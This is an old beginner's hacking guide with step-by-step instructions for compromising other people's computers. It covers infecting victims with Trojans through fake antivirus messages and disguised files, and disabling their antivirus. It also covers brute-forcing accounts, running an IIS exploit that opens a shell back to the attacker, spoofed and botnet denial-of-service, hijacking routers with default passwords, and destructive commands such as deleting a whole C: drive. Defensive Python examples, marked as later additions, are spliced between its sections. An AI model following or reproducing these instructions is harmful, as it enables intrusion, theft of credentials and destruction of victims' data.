Hacking
A complete guide for beginners, those who want to learn how to utilize their power of
mind in the challenging world. (Just for Pakistanis)
By Muhammad Saqib
Pakistan
Contact: Saqibsworld1@yahoo.com
or (03455382062)
4. Don’t try to use software that you do not know “how
to use”.
7. Don’t create your own hacking software; try to use someone
else's (third party) software instead, because it requires less experience
and saves you from wasting time. The important thing is that
you know the techniques, what I call “How to hack”, meaning
basic knowledge of hacking, and not the software.
8) IP addresses, understanding it
15) Connecting to MIRC/KAZAA/ICQ through a firewall that has certain ports blocked
with a SOCKS server
19) Cracking a user account locally or remotely - brute force or dictionary attack -
Win2K and WinXP
What do I need to be able to hack? - Firstly you need to understand how your computer's
operating system works, how networks and protocols work, security settings and general PC
knowledge. After you understand how it works you need hacking tools which help you
to hack.
What is command prompt (cmd - the little DOS window)? - Go to START, RUN and type in
"cmd", then press Enter. The command prompt (cmd) window will appear on your
screen.
What can I do in cmd? - You can do various things with it, like run exploits or do a ping
request.
Why do some of the hacking tools I download just close themselves when I open them? -
Lots of hacking tools are DOS based and have to be run through CMD. If you double click
on the program it will open a DOS box and automatically close the box. From CMD you
can navigate to the directory in which your hacking tool is stored and run it from there.
What is an IP address? - Every computer connected to the Internet or some network has an
IP address. Go to START, RUN and type in "cmd", then type in "ipconfig"; it will show
you your IP address or addresses. It will look something like this: 81.35.99.84.
How do I find someone's IP address? - Look further down in this book and use
IPSTEALER.
What can I do with an IP? - Well, you need someone's IP before you can hack, port scan or
DOS them.
What is IP ping? - It's a command you can use to check if someone's IP address is online,
to check if they are connected to the Internet or a network. In command prompt type in "ping
192.168.0.21" - this will show you something like this:
That means you can successfully PING IP 192.168.0.21, which means the IP is online. If
you get a message "request timed out" it means the IP is not online.
Why can't I ping a certain IP? - Either the IP is not online / in use, or the person you’re
trying to ping is running a firewall which blocks ping requests, or maybe your firewall is
blocking outgoing ping requests.
Why do I have two IP addresses when I do an ipconfig? - Well, if you’re on a local LAN
(local area network) you will have an IP like 192.168.0.1. If you’re also directly
connected to the internet you will have another IP address like 80.87.34.56. 192.168.0.1
is your local IP, which you use to communicate with your local internet network (LAN),
and 80.87.34.56 is your internet IP.
What is a static and dynamic IP address? - Static means a permanently set IP address - like a
website will have a static IP address, it never changes. Dynamic means a temporary IP
address - dialing up to the Internet with a modem or most ADSL connections have
dynamic IPs. Every time you log on to the Internet your ISP (Internet Service Provider)
will issue you a new IP address.
I have sent someone a Trojan but I cannot connect to their PC? - Either they are running a
firewall which blocks you from connecting to their PC, or they are connected to the
internet through a router.
What do I do when someone is behind a router and I want to control their PC with a
Trojan? - You will need to use a Trojan which uses reverse connections - meaning you
don't connect to the host, the host connects to you. Bifrost is a Trojan which has the
mentioned function. Remember when someone is behind a router and you’re using
IPstealer to get hold of their IP address, you are actually getting their router's IP, not their
actual PC's IP. The router will have the person’s internet IP (WAN IP) and their PC will
have a different IP - their LAN IP.
How do I check if my own PC is infected with a Trojan? - Do a port scan on your PC and
check which ports are open. If you find any open ports in this Trojan port list you might
be infected with a Trojan. Download the Trojan you think you might be infected with and
connect to that specified port.
What is a router? - A device which is used to route data on a network. A Router decides
where certain traffic should be sent to.
What is a firewall? - It's a software or hardware device which can block or permit certain
ports or IPs or certain kinds of data.
What is a port and what can I do with it? - Every program running on your PC which has
some network function uses a specific port to send and receive data through. If you do a
port scan you will see which ports are open on the host you scanned. Port 80 is normally
a web server, port 21 an FTP server, etc. Trojans also use ports. Check this list of Trojan
ports; if you find an open port in this list, the host might be infected with a Trojan,
download the Trojan and try connecting to the port.
How do I do a port scan? - You need a program like superscan to do a port scan. Then all
you do is add the IP you want to scan.
Why do you want to scan ports? - If you scan a PC with a port scanner, it will show you
which programs or services are running on the PC.
Common ports:
Ping : 7
Systat : 11
Time : 13
NetStat : 15
SSH : 22
Telnet : 23
SMTP : 25
Whois : 43
Finger : 79
HTTP : 80
POP : 110
What is an exploit? - It's a poorly coded piece in software which you can use to gain access
to the system. There are many exploits available for the various versions of MS Windows out there.
How do I use an exploit? - You first need to compile the exploit with a program like
Bloodshed C++ compiler. Then you can start the exploit through command prompt and
see if the system you’re trying to exploit is vulnerable to that specific exploit. Scroll
down for more information about exploits.
What is an exploit POC? - POC stands for proof of concept and it is the proof that an exploit
works.
What is a DOS attack? - It is when too much data is being sent to a host and it cannot
handle all the data and disconnects from the Internet.
How do I see what connections are currently made to my PC? - In cmd type in "NetStat" -
it will show you the IP addresses of connections to your PC and what ports they are using.
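An added example, not part of the original guide: the self-check described above (look at your own open ports and compare them with a Trojan port list), done in Python over the output of "netstat -ano". The sample output is constructed, the watchlist holds only the Sub7 port 27374 that this guide names, and the function names are this example's own.

```python
import re

# Watchlist of ports tied to known Trojans. Only 27374 (Sub7) is named in
# this guide; extend the dictionary from a port list you trust.
TROJAN_PORTS = {27374: "Sub7"}

# Constructed sample of `netstat -ano` output from the PC being checked.
SAMPLE_NETSTAT = r"""
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       968
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:27374          0.0.0.0:0              LISTENING       1812
  TCP    127.0.0.1:1080         0.0.0.0:0              LISTENING       2204
  TCP    192.168.0.21:1043      81.35.99.84:80         ESTABLISHED     3120
  TCP    192.168.0.21:139       0.0.0.0:0              LISTENING       4
  UDP    0.0.0.0:445            *:*                                    4
"""

# proto, local address:port, foreign address, optional state (UDP has none), PID
ROW = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)\s+(?:([A-Z_]+)\s+)?(\d+)\s*$"
)


def parse_netstat(text):
    """Turn netstat -ano text into a list of dicts; headers are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        proto, ip, port, foreign, state, pid = m.groups()
        rows.append({"proto": proto, "ip": ip, "port": int(port),
                     "foreign": foreign, "state": state or "",
                     "pid": int(pid)})
    return rows


def listening(rows):
    """TCP sockets waiting for incoming connections."""
    return [r for r in rows
            if r["proto"] == "TCP" and r["state"] == "LISTENING"]


def flag_suspects(rows, watchlist=TROJAN_PORTS):
    """Return (port, trojan name, owning PID, reach) for watchlist matches.

    A match is a lead, not proof: any program may listen on any port, so
    the owning process still has to be identified from the PID.
    """
    hits = []
    for r in listening(rows):
        if r["port"] in watchlist:
            if r["ip"].startswith("127."):
                reach = "loopback only"
            else:
                reach = "reachable from the network"
            hits.append((r["port"], watchlist[r["port"]], r["pid"], reach))
    return hits


if __name__ == "__main__":
    rows = parse_netstat(SAMPLE_NETSTAT)
    print("Listening TCP ports:", sorted(r["port"] for r in listening(rows)))
    for port, name, pid, reach in flag_suspects(rows):
        print(f"port {port} matches {name}, owned by PID {pid}, {reach}")
        print(f'  identify the program with: tasklist /FI "PID eq {pid}"')
```

On a real PC, save the output with "netstat -ano > ports.txt" and pass the file's contents to parse_netstat in place of the sample.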
What is a MAC address? - It's a hard coded number, almost like a name, which is
embedded into a network card. It identifies the manufacturer of the card and a unique
number for the card. No two network cards in the world have the same MAC address.
e in "ipconfig /all"
For someone else's MAC address you need their IP address; then go to cmd and type in
"nbtstat -a 192.168.0.5" or whatever IP they use. This will show you their MAC address
as well as their currently logged on user.
What is a Windows Registry and how do I access it? - It's where Windows stores most of
the configurations of your operating system and most programs installed. You might use
it to make a Trojan server file you uploaded to the PC run automatically when Windows
starts up. To access the registry go to START, RUN and type in "regedit".
Be careful what you change in the registry, it might screw up your PC. First make a backup
of the registry.
How do I hack a webpage/ web server? - Read the IIS hacking tutorial in the MISC
download section on Windows Hacker. Remember not all web servers run IIS!
What is IIS? - It is Microsoft's web server. IIS - Internet information server. Most web
servers run on port 80.
How do I check if a website is running on IIS? - Telnet to the website URL through CMD
- "telnet www.siteyouwanttocheck.com 80"
What is telnet? - Program which can be used to connect to remote computers or routers
and to run commands by simply typing them in its window.
How do I hack into a Gmail, Yahoo or Hotmail email account? - Every now and then
someone discovers a way to get into those email servers, but the service provider fixes
the security hole so fast, there is no straight answer for that. Best way is to install a key
logger on the victims PC and get their login details. Otherwise download THIS program
like mps1.3 for yahoo or brute force which you can use to brute force a hotmail account.
How do I hack into a POP3 email account? - Hydra 5.3 is a program which you can use
to crack POP3 accounts. You will need a wordlist which Hydra will use to crack the
POP3 password.
What is a key logger? - It is a program you install on someone's PC which captures every
key that is pressed on their keyboard which is emailed to you or stored into a file.
How do I get the administrator account password while logged in to the PC? - Locally
run a program like Adminhack for local administrator account cracking. If you need to do
it remotely run a program like Venom or Starbrute.
What is a SAM file? - The SAM file is the file which stores all the user accounts and their
password hashes, like the Administrator account. The SAM file is stored in
"C:\WINDOWS\system32\config" but it is locked and inaccessible while you are busy
using Windows - meaning you can't copy it while you’re in Windows. You need to boot
up with another operating system like NTFSDOS or Linux with NTFS support. When
you have copied the SAM file you can crack the passwords stored in the SAM file with a
program like LC5. With Pwdump6 it is possible to get access to the SAM file while
logged into Windows. It can also connect to a remote PC and grab the password hashes
from the SAM file. An Administrator account is needed.
How do I find out what operating system does my target run? - Download Detect and use
it against your targets IP address. Result:
C:\>detect.exe 127.0.0.1
[*] ------------------------------ [*]
[*] XP/2K OS Detector [*]
[*] by: ill will & phr0stic [*]
[*]------------------------------[*]
[+] Finding Host 127.0.0.1
[+] Connected to 127.0.0.1
Firstly install Win XP with the latest Service Pack. Run Windows Update (START, ALL
PROGRAMS, WINDOWS UPDATE) and update Windows and all your device
drivers. Download the latest versions of the applications you use, like an FTP server or
proxy; old versions of programs are insecure and you could be hacked that way.
Disable the "guest" account on your PC and rename your "administrator" account. Right
click My Computer and choose Manage. Stop any services you don't use, but be careful
not to stop something that you use (RIGHT CLICK MY COMPUTER, CHOOSE
MANAGE, SERVICES AND APPLICATIONS, SERVICES). Stop the
MESSENGER and REMOTE REGISTRY services. Delete the admin shares: share each one as
something else and then stop sharing it. Then when you reboot it will not be shared
automatically again. With these admin shares domain admins and hackers can access
your PC. Make sure to put a complex password on all your accounts. Make your hard
drive NTFS - it is the file system you format your hard drive with. Put a password on
your BIOS and make sure you change the boot order to boot first from the hard drive, so
someone cannot boot up with a CD, delete your SAM file, or crack its password and gain
administrator access to your PC. Make sure the built in firewall is enabled. Check in
Control Panel for Windows Firewall. This firewall may be the reason that some of your
hacking applications and tools stop working, so if you have a problem with an
application make sure to add this program to your Windows Firewall exceptions. Install
some kind of anti virus program; Norton Anti Virus works well, but remember that a lot
of hacking tools are picked up by Anti Virus, so disable your Anti Virus before running
those tools. Also install a Spyware removal tool like Spyware Doctor. Spyware is
irritating software which is installed onto your PC through files you download from the
net or web pages you open which have malicious code in them. It slows down your PC and
might send your information to the Spyware creator.
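An added example, not part of the original guide: a Python check of three of the hardening steps above (guest account, MESSENGER and REMOTE REGISTRY services, admin shares) against saved output of "net user guest", "sc query" and "net share". The captures are constructed and simplified, and the function names are this example's own.

```python
import re

# Constructed, simplified captures from the PC being checked.
NET_USER_GUEST = """\
User name                    Guest
Account active               Yes
Password required            No
"""

SC_QUERY = """\
SERVICE_NAME: Messenger
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 4  RUNNING

SERVICE_NAME: RemoteRegistry
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 1  STOPPED
"""

NET_SHARE = r"""
Share name   Resource                        Remark
-------------------------------------------------------------------------------
C$           C:\                             Default share
IPC$                                         Remote IPC
ADMIN$       C:\WINDOWS                      Remote Admin
Docs         C:\Docs
The command completed successfully.
"""

# Drive shares such as C$ plus ADMIN$ (the Windows directory).
ADMIN_SHARE = re.compile(r"^(?:[A-Za-z]\$|ADMIN\$)$")


def guest_enabled(net_user_text):
    """True when `net user guest` reports the account as active."""
    m = re.search(r"^Account active\s+(\S+)", net_user_text, re.M)
    return bool(m) and m.group(1).lower() == "yes"


def running_services(sc_text, watched=("Messenger", "RemoteRegistry")):
    """Names of watched services whose STATE line says RUNNING."""
    running, current = [], None
    for line in sc_text.splitlines():
        line = line.strip()
        if line.startswith("SERVICE_NAME:"):
            current = line.split(":", 1)[1].strip()
        elif line.startswith("STATE") and current in watched \
                and "RUNNING" in line:
            running.append(current)
    return running


def admin_shares(net_share_text):
    """Share names from `net share` that are administrative shares."""
    found = []
    for line in net_share_text.splitlines():
        fields = line.split()
        if fields and ADMIN_SHARE.match(fields[0]):
            found.append(fields[0])
    return found


def audit(net_user_text, sc_text, net_share_text):
    """Collect every finding as a readable line; empty list means clean."""
    findings = []
    if guest_enabled(net_user_text):
        findings.append("Guest account is active")
    for name in running_services(sc_text):
        findings.append(f"Service still running: {name}")
    for share in admin_shares(net_share_text):
        findings.append(f"Admin share present: {share}")
    return findings


if __name__ == "__main__":
    for finding in audit(NET_USER_GUEST, SC_QUERY, NET_SHARE):
        print("[!]", finding)
```

A service shown as STOPPED can still be set to start at the next boot, so check its start type in the Services console as well.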
(3) Using a Trojan / RAT
Trojans is one of the first things you must learn when you want to hack. A Trojan is a
small program you send to someone to infect their PC so you can control their PC, steal
passwords, files or just have some fun. Every Trojan works on a different port, like Sub7,
works on port 27374. If you scan a PC and find that port 27374 is open, it means the
machine is infected with Sub7. Now of course the Trojan can be set with a password, it’s
up to you to crack it then. Now remember that most Trojans are picked up by Anti Virus
software. You need a new released Trojan which AV does not pick up.
The Trojan most people know is Sub7. Before you can start using the Trojan, you first
need a host to infected with a Trojan. A host can be infected in a lot of ways. You can
send the host the Trojan server file, and tell them it's a game or a firewall or whatever you
like it to be. Best is to rename the file to something they will think is useful like:
WindowsXP_update.exe. You can email them this file or put it on a downloads area on a
web page, use your imagination. My Favorite way is to send people a "net send" message
with MSMH and choose a name like NortonAntivirust_Support and tell them their PC
was detected with a virus, please go to
www.yourpagewithtrojanfile.com/Virus_Cleaner_V1.20.exe and run the file to remove
the virus from their PC. Net send only works on NT4 and Win2k and Win XP machines
that's got messenger service enabled. Disable your messenger service; you do not want
people sending you stupid messages. You can also bind the Trojan file with another file,
any executable file the Trojan can be binded to. Always remember to rename the file,
change the program icon and the put a password on the server file. Bind the file with
another file and set the file to automatically delete itself after executed, or set it to give an
system error.
When you infect a host or find an infected host, it's time to connect. An easy way to find
Trojan infected hosts is with Trojan hunter. Choose an IP range to scan through and it will
search for Trojan infected hosts. When you have found an infected host, download the Trojan
client from my Trojans page. Connect with the Trojan to the host IP, to the certain port
the Trojan works on and you are ready to take control. Each Trojan uses a different port.
Here is a list of ports which a certain Trojan works on.
With most Trojans, you will be able to log keystrokes on a PC, even get logged into a file,
and when the host is online it will email the keystrokes to an specified email address.
Delete or copy files, reboot the PC, make screen captures or disable the screen or mouse.
With Sub7 you can do anything on the infected host, just as if you where sitting in front
of the PC itself.
Important things to remember. A Trojan comes with a file called "server.exe". Never run
that file on your own PC, it will infect your PC with the Trojan! Use the Trojan's
configuration file to make changes to the "server.exe" file and then send the file to a
victim.
There are also Trojans which have the option to do a reverse connection. Very useful if the
person sits behind a router or firewall. After you have infected the victim's PC, the Trojan will
automatically connect to you, thus getting past the problem of connecting through a
router or firewall. Remember that if you do not connect to the Internet directly (with a
modem) and you sit behind a router, you will need to forward the Trojan ports in your
router's configuration if you are doing a reverse connection.
Try out Bifrost RAT or Poison Ivy RAT which can do reverse connections, useful when
the host is behind a router.
Finding PCs with shares over a LAN or over internet is very easy. Choose a certain IP
range and use Netscan to search through the IP range for PCs with shares. A PC can only
have shares if it is connected to a network or has file and printing enabled, so mostly
computers with an network card. If you find a computer with a share, use Windows to
connect to that share. Go START, RUN and type in "\\IP\sharename". Example
"\\198.55.67.244\c" or with the PC name "\\pc1\c" - then you will have access to the
share, to delete, copy or rename files or directories, depending what it was shared as, but
most people share things with full access and no password. If you find a PC with shares,
but when you try and connect to it, it ask you a password, the easy way to crack it is with
PQWak, this program brute force cracks the password for you - Win9X only. Windows
NT/XP, works through permissions, so if something is shared, it is shared with
permissions to the folder, and permissions is given to an user name. But a lot of people
make shares with full access to anyone. Win2K/XP accessing an share like the C$ share
will ask you an username and password, if there is no password specified by the person
who's PC it is. Trying username as Administrator and password blank. Most people got
administrator account password blank, easy way to get onto their shares. Windows 2000
and XP you can use Venom or Starbrute to brute force or dictionary crack local accounts.
If you gain access to someone's hard drive, copy a Trojan server file into their startup
folder, and then when they reboot their PC, the Trojan will run and you will have access
to their PC with the Trojan.
(5) Hacking a PC with a exploit
What is an exploit? It's a poorly coded piece in software which you can use to gain access
to the system. There are many exploits available for the various versions of MS Windows out there.
Check this page for new exploits: http://www.frsirt.com/exploits/ Now if you’re a n00b,
you don't know how to compile an exploit; basically you need some programming
experience, so go learn how to program. Most exploits are written in C++ so try
Bloodshed Dev C++ which you can use to compile exploits. Read this tutorial about
compiling exploits. But you can download exploits which other people have already
compiled. If someone updates their PC when new exploits come out, you can't exploit
them. But if they don't update and install new patches, the chance you can exploit and
gain access to their PC is big. Check this example of how an exploit works:
This is an exploit for Win2k/XP and it’s already compiled, you can download it by
searching on Google. This is an explanation of how to use it:
------------------------------------------------------------------------
-------------------------------------------------------------------------
Scan in Progress....
- Connecting to 192.168.1.101
C:\WINNT\system32>
^^
7. Group to admin
^^^
C:\WINNT\system32>exit
Type the password for \\192.168.1.101\C: <--- enter myuser's password here
There you will now have a mapped drive to the target PC and an administrator account.
Nuking was in the Windows 95 / NT4 days. The original WinNuke was for Windows 95.
It attacked the host on port 139 (win95) and port 135 (winNT). Yes, some people still
use Windows 95 and NT4, but not a lot of people. If you find someone by any chance,
use Superkod. I found it works best. Open up the program, type in the IP and click
NUKE. If the person is using Win95 or WinNT4, and they're unpatched, their internet
connection will be dropped or they will get a BSOD.
That's all very well and all, but with a program like KOD, it does not hide your IP from
your attacker. If they are running a firewall, they will see where all this traffic is coming
from and they will see it's YOU. So now, you need to spoof your IP address so the
attacker cannot see who the attack is coming from. For Win2k/XP, I would recommend
using Smurf2k, Nemesy or Jolt that was designed for attacking Win2k, but Jolt does not
spoof the IP so beware, only Smurf2k and Nemesy spoofs the IP. Smurf2k uses a
broadcast list, a list it uses for address to spoof from. So if you attack someone, they will
see IP's attacking them that do not exist. Before you attack someone, find out what
connections he has, because if he wants to attack him with bandwidth, you will need
more than him. So if it is an modem user with no firewall, you will be able to disconnect
him yourself. If it is someone with more bandwidth than you, a firewall or a patched
system, you will need BANDWITH to disconnect him. So gather around a few of your
buddies, give them a DOS tool and all of you guys at the same time attack him. Make
sure you run a firewall that blocks incoming IGMP, ICMP, UDP and TCP incoming
connections if they start attacking back. Heck even better, infect a few hosts on a ADSL
line or a corporate line with a lot of bandwidth, and take down microsoft.com. This is the
part when Zombies comes in. You infect a few hosts (Zombies) and control them to do a
DOS attack on someone. It works almost like a trojan which you infect their PC and take
control of it.
Try Freak88 - it allows you to control a few PC's at the same time and do a DOS attack.
Also try DOS 3 from the DDOS section, it’s a very cool application and there is an
detailed explanation, it also supports spoofing.
So you would like to know someone's PC name, or their MAC address of their network
card or the username that currently logged onto the PC? It can be very useful to have this
info on someone. Their PC name can be their own name or company name. Their MAC
address is the address of their network card, which is static, means that it can never
change. Their username can also be useful if you would like to know this persons name.
All of this can only be retrieved if the person has a network card installed on their PC.
It will show you the PC name, domain name if it is connected to a domain and it will
show the user name logged onto the PC. The MAC is static, meaning it never changes,
useful for identifying someone. Your buddy attacks you, you check his IP and you do a
"nbtstat" on him, and you gets his MAC address. So now if you check on his PC, and see
he has got the same MAC address you know it was him attacking you.
IP spoofing is basically when you attack someone and you use a bogus IP. A DOS attack
or whatever, it attacks the target, but the target only receives data from bogus IPs, IPs
that do not really exist, or that do exist but are someone else's IP, not yours. Every
network card has a burned in MAC address. A MAC address looks something like this:
00-40-AH-4E-E0-90, it cannot be changed - well kind of, so if you attack someone and
they do a nbtstat on you and get the MAC address of your network card, it is a simple way
of identifying you as the attacker.
IIS is Microsoft's internet server. It is very buggy and very exploitable. Defacing an IIS
server is actually very easy. A lot of system administrators do not load patches on their
IIS servers so they are the people who get defaced (hacked). The IIS servers I will
show you how to hack are IIS 4/5. IIS 6 is the industry standard at the moment, but there are still a
lot of IIS 4/5 servers online. The way an IIS server is hacked is through buffer
overflows and exploits. This is when a certain code is sent to the server; the server gets
confused and grants you root access to the server. There are a lot of IIS hacking tools
making it easy for anyone to hack an IIS server. Not all web servers run on IIS; there
is much other web server software out there, like Apache. We will only be dealing with
IIS servers.
Firstly you have to find a IIS server. Dreamscape IIS scanner is very useful. It gives you
the option to scan a certain IP or an IP range. It will search and tell you if it finds any IIS
servers, and which version the host is running. Another way is to telnet to the IP on port
80. In dos prompt (Start, Run, and CMD) type in: telnet 196.35.45.21 80. It will open
telnet and show you what IIS the host is running. Web servers normally run on port 80,
but it can be any other specified port. If you find an IIS server, it's time to DEFACE it :)
We will first use Jill-win32 for now. It exploits an IIS5 printer overflow. In dos prompt
(Start, Run) run jill-win32. It will show you this:
Usage: jill-win32 <victim Host> <victim Port> <attacker Host> <attacker Port>
http://www.eEye.com
Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you should
get a cmd prompt.
Trying www.[yourowncompany].com...
C:\WINNT\system32>whoami
Windows 95/98 does not react well to the /con/con command. Any Windows 98/95 PC
can be crashed with this /con/con exploit, but you need access to a share on the PC, any
access will work.
<Html>
<Head><title>Crash! </title></head>
<Body>
</body>
</html>
The pcname is the Pcname of the PC you want to crash (or the IP) and the share name is
the share you got access to. When you open the htm file and click on the link, it will crash
(BSOD) the PC.
Now this is something that can really create havoc!!! I tested it on Win9X and Win
NT4 .Does not work on Win2k or Win XP. Beware don't try this on yourself!! Windows
9x and NT 4 has a flaw which allows an remote connection to create undeletable, well
practically undeletable files and directories to be created anywhere on a remote machine.
These files and directories can be deleted, but it takes about 2 minutes to delete through
dos commands. Download NetBIOS Bomber, choose the target and choose which OS and
you ready to makes someone's life hell. Remember if their system is update it will not
work.
Download RA-Anonymous email first. Then choose who you want to send to and who
you want the email to be from. For this to work you will have to find an SMTP server that
accepts relaying. So in the server space put in: "smtp.mweb.co.za" - this SMTP worked
at the time I tested it. And you are ready to send someone email from
billgates@microsoft.com!! :) Use OPENRELAYCHECKER; by searching at
http://www.google.com download OPENRELAYCHECKER which you can use to search
for email servers that support relaying.
Resetting your Win2K admin password is easy. Boot up with a Win9X boot up disk or
CD. Go to Winnt\system32\config directory. There will be a file called "SAM" Delete
that file and reboot machine. Now the Administrator account password will be reset to
blank (no password). Only works with FAT32 partitions. For Windows XP need this file
which has a few utilities you can use to reset the XP administrator password. Then there
is also a program called Adminhack which you load in a dictionary file to crack the
administrator account if you have local access on the PC.
(15) Connecting to MIRC/KAZAA/ICQ through a firewall that has certain ports blocked
with a SOCKS server
When you are behind a firewall and MIRC, Kazaa or ICQ are blocked you can use a
technique called http tunneling. Basically your program connects to a program running on your
computer and that program redirects the data through HTTP. Download HTTPORT or
SOCK2HTTP. It will run a SOCKS server on your PC which you can use to connect
MIRC, Kazaa or ICQ or whatever program you want to use that is blocked by the
firewall. In mIRC or Kazaa go to settings and tell the program to connect to your SOCKS
server. The server address is 127.0.0.1 - your local IP - and the SOCKS port is port 1080.
Let’s say you try and upload a trojan to someone's machine and their anti virus picks it
up. Check if you can get a account on the machine with Administrator rights. If you have
an account like that, you can use PSKILL and kill the anti virus program or firewall. You
can basically kill any program or process running on the machine, but it must be a Win2k
or XP machine. If the person is running Norton anti virus the file will be something like
nav32.exe. Now with pskill the command will be :
Here is a few things u can do to someone to annoy the living hell out of them :)
1) Blue Screen Of Death : Create a batch file "something.bat" and edit the file so it
contains the following (Win9X only)
C:\Aux\Aux
or
C:\Con\Con
2) Deleting the persons whole C drive with this command : Deltree /y c:/*.*
3) Make a screen shot of the persons desktop. put that picture as their background and
hide the start bar and desktop icons. With 2000 and XP, lock the PC and move the
windows out of the way, just check how clever your friend really are. Or put a password
one a screen saver and put the screen saver file into the startup folder. They will have to
boot up into save mode to restore the screen saver.
4) A nice harmless trick, schedule something like a screen saver with a password on a PC
for a certain time, sure to make someone scream.
5) Go to the windows directory and look for a file Win.ini. Edit the file and look for a line
with : shell=Explorer.exe. Change this to something like YOUR PC HAS A VIRUS ON
IT. When the PC gets restarted it will come up with that message and it will not boot up
@ all. Look for system.ini, change the same, shell="explorer.exe to shell=". Bill Gates
Hates You" :)
(19) Cracking a user account locally and remotely - brute force or dictionary attack -
Win2K and WinXP
When you need the password of a account on your local machine or on a remote machine
you can either brute force or dictionary attack the account. Remember this could take
from 1 minute to a few days depending on how complex the password is.
------------------------------------------------------------------------------------------------------
Lbrute is a program which you can use to guess a user account password with a
dictionary attack while logged onto the machine locally. You will need a wordlist which
Lbrute can use to guess the password. Example of how to use Lbrute:
Starbrute can either be used to crack a user account on your own local PC or it can be
used to crack a user account on a remote PC. Starbrute uses brute force to guess the
password. Meaning it will use Charset: 1234567890abcdefghijklmnopqrstuvwxyz in
random order to guess the password.
▓ Charset: 1234567890abcdefghijklmnopqrstuvwxyz
▓ Start length: 3
▓ Max length: 4
■ Starting...
High means the program will use a lot of resources - the higher the faster it can guess the
password.
With both these programs you can specify any account on a machine - administrator,
guest or whatever.
Remember you can find out what account is logged onto a machine by typing this
command into CMD: nbtstat -a IP. It will show you the username currently logged on and
then you can try and crack that account password.
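An added example, not part of the original guide: how the password guessing described in this section looks from the defending side. It scans logon events for a burst of failures against one account from one source and notes whether a successful logon followed. The records are constructed, in a simplified "time,event ID,account,source" form (event 529 is a failed logon and 528/540 a successful one on Win2K/XP); the threshold and window are assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAILED = {529}          # Win2K/XP: logon failure, unknown user or bad password
SUCCEEDED = {528, 540}  # Win2K/XP: successful logon / successful network logon

# Constructed sample records: time,event ID,account,source address
SAMPLE_EVENTS = """\
2007-03-01 09:40:00,529,alice,192.168.0.9
2007-03-01 09:52:10,529,alice,192.168.0.9
2007-03-01 09:52:30,528,alice,192.168.0.9
2007-03-01 10:00:01,529,Administrator,192.168.0.5
2007-03-01 10:00:02,529,Administrator,192.168.0.5
2007-03-01 10:00:03,529,Administrator,192.168.0.5
2007-03-01 10:00:04,529,guest,192.168.0.5
2007-03-01 10:00:04,529,Administrator,192.168.0.5
2007-03-01 10:00:05,529,Administrator,192.168.0.5
2007-03-01 10:00:06,529,Administrator,192.168.0.5
2007-03-01 10:00:09,540,Administrator,192.168.0.5
"""


def parse_events(text):
    """Yield (time, event id, account, source) tuples from the sample form."""
    for line in text.splitlines():
        if not line.strip():
            continue
        when, event_id, account, source = line.split(",")
        yield (datetime.strptime(when, "%Y-%m-%d %H:%M:%S"),
               int(event_id), account, source)


def detect_guessing(events, threshold=5, window=timedelta(seconds=60)):
    """Alert when one account gets `threshold` failures from one source
    inside `window`; record whether a successful logon came afterwards."""
    recent = defaultdict(deque)   # (account, source) -> recent failure times
    alerts = {}
    for when, event_id, account, source in events:
        key = (account.lower(), source)
        if event_id in FAILED:
            times = recent[key]
            times.append(when)
            while when - times[0] > window:   # drop failures outside window
                times.popleft()
            if key in alerts:
                alerts[key]["failures"] += 1
            elif len(times) >= threshold:
                alerts[key] = {"account": account, "source": source,
                               "first_alert": when, "failures": len(times),
                               "succeeded_after": False}
        elif event_id in SUCCEEDED and key in alerts:
            # A success right after a burst means the guess probably worked.
            alerts[key]["succeeded_after"] = True
    return list(alerts.values())


if __name__ == "__main__":
    for a in detect_guessing(parse_events(SAMPLE_EVENTS)):
        outcome = "LOGON SUCCEEDED AFTERWARDS" if a["succeeded_after"] \
            else "no success seen"
        print(f'{a["account"]} from {a["source"]}: '
              f'{a["failures"]} failures, {outcome}')
```

The two slow failures for "alice" and the single "guest" failure stay below the threshold, so only the burst against Administrator is reported.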
Routers are devices which are used to route data on a network; a router decides where certain
traffic should be sent. A router acts as a gateway to the Internet and is used by most
people these days to access the Internet instead of modems. A client PC could either be
connected to the Router through a LAN cable or with a wireless card. Routers are mostly
configured through a web based system or with a command prompt window (cmd). Most
home users with ADSL use Routers as their gateway to the Internet. Most Routers are
configured so that they can only be administered through the web based system when you
are connected to the Router's local network - the internal LAN. To connect to the Router
you will use your web browser. A typical router IP address would be 192.168.0.1. So this
would be the address to use to connect to the Router through a browser: http://192.168.0.1/
If you are using a Router as your Internet gateway try connecting to it. Remember the
router's IP address could differ from the example above. If you don't know your Router's
IP address go to command prompt and type in: ipconfig
Your local area connection gateway address will be your Router's IP address. Remember
the Router is your gateway to the Internet. When you are connected to your Router
through the web based system it will ask you for a username and password. If you know the
login details use them to log into the Router. If you do not know the login details you can try
the default login details as set by the Router manufacturer. Have a look at this list with
default login details. In your Router's configuration you can set the settings which the Router
uses to connect to the Internet, security settings, local LAN configurations, DHCP
settings, port forwarding, statistics and information about the Router status and many
more. Accessing a Router through a command prompt window can be achieved by going
to command prompt (cmd) and typing in:
telnet 192.168.0.1 23
23 is the port on which the Router will be accessed. You can access someone else's Router
over the Internet, login and change settings or even steal their ISP (internet service
provider) details. When you Telnet to a Router and it brings up the login screen it
sometimes will show you what make and model the Router is. Then check the default
password list and see if you can login with those default login details and obtain access to
the Router. If the person whose Router it is has not changed the Router's default login
details you should be able to access the Router easily. Most home users do not change the
default passwords. When you access someone else's Router over the Internet, you can
change settings, forward ports, reset the Router or even steal their ISP (internet service
provider) details. Telnetting to a Marconi ADSL Router with the CX82310 chip from
Conexant on port 23 will give the following output:
LOGIN PASSWORD>
And logging into the Router will bring up the main menu:
MAIN MENU
2. ADSL MENU
4. REMOTE LOGON
Q. LOGOUT
ENTER CHOICE-->